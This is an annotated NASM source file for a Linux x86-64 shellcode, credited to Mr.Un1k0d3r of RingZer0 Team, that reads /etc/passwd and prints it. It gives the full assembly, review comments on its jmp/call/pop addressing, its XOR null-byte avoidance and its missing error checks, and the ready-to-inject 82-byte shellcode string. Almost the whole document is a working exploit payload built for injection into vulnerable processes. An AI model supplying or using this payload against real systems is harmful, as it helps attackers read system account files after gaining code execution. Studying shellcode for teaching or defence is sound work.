BITS 64
; Author Mr.Un1k0d3r - RingZer0 Team
; Read /etc/passwd Linux x86_64 Shellcode
; Shellcode size 82 bytes
;
; Syntax: NASM (Intel operand order). Target: Linux x86-64, raw `syscall`
; interface (rax = number; rdi, rsi, rdx = first three arguments).
; Flow: open(path, O_RDONLY) -> read(fd, stack buffer, 0xfff)
;       -> write(1, buffer, bytes read) -> exit.
;
; Reviewer notes:
;  * The code locates its own data with jmp/call/pop, so it contains no
;    absolute addresses.
;  * `path` sits in section .text and is patched in place at run time, so the
;    code only works from memory that is both writable and executable; on a
;    read-only code mapping (W^X) the store in _readfile faults.
;  * No syscall return value is checked: a failed open() hands a negative
;    errno to read() as the fd, and a failed read() hands one to write() as
;    the length.
;  * The path is stored in clear text apart from its masked terminator, so
;    the literal "/etc/passwd" remains visible in the assembled bytes.
global _start

section .text

; Entry point: jump forward so that the `call` in _push_filename can push the
; address of `path` onto the stack.
_start:
    jmp _push_filename

_readfile:
    ; syscall open file
    pop rdi                     ; rdi = address of `path` (return address pushed by the call)
    ; NULL byte fix: byte 11 of the string is 'A' (0x41); XOR with 0x41 turns
    ; it into 0x00 at run time, so the assembled bytes need no literal NUL.
    xor byte [rdi + 11], 0x41

    xor rax, rax
    add al, 2                   ; rax = 2 (open)
    xor rsi, rsi                ; set O_RDONLY flag; rdx (mode) is not initialised here
    syscall                     ; rax = fd, or negative errno (not checked)

    ; syscall read file
    ; NOTE(review): `sub sp` is a 16-bit operation, so only the low 16 bits of
    ; rsp change and a borrow does not propagate into the upper bits. It also
    ; leaves rsp unaligned; no call follows, so nothing here depends on that.
    sub sp, 0xfff               ; reserve 0xfff bytes below the stack pointer
    lea rsi, [rsp]              ; rsi = buffer
    mov rdi, rax                ; rdi = value returned by open
    xor rdx, rdx
    mov dx, 0xfff               ; rdx = 0xfff, size to read (zeroed first, then 16-bit load)
    xor rax, rax                ; rax = 0 (read)
    syscall                     ; rax = bytes read, or negative errno (not checked)

    ; syscall write to stdout
    xor rdi, rdi
    add dil, 1                  ; set stdout fd = 1
    mov rdx, rax                ; length = value returned by read
    xor rax, rax
    add al, 1                   ; rax = 1 (write); rsi still points at the buffer
    syscall

    ; syscall exit
    xor rax, rax
    add al, 60                  ; rax = 60 (exit); rdi is still 1, so the exit status is 1
    syscall

; `call` pushes the address of the bytes that follow it (the path string) and
; transfers control back to _readfile, which pops that address into rdi.
_push_filename:
    call _readfile
    path: db "/etc/passwdA"     ; 12 bytes; trailing 'A' stands in for the NUL terminator
Shellcode:
\xeb\x3f\x5f\x80\x77\x0b\x41\x48\x31\xc0\x04\x02\x48\x31\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x41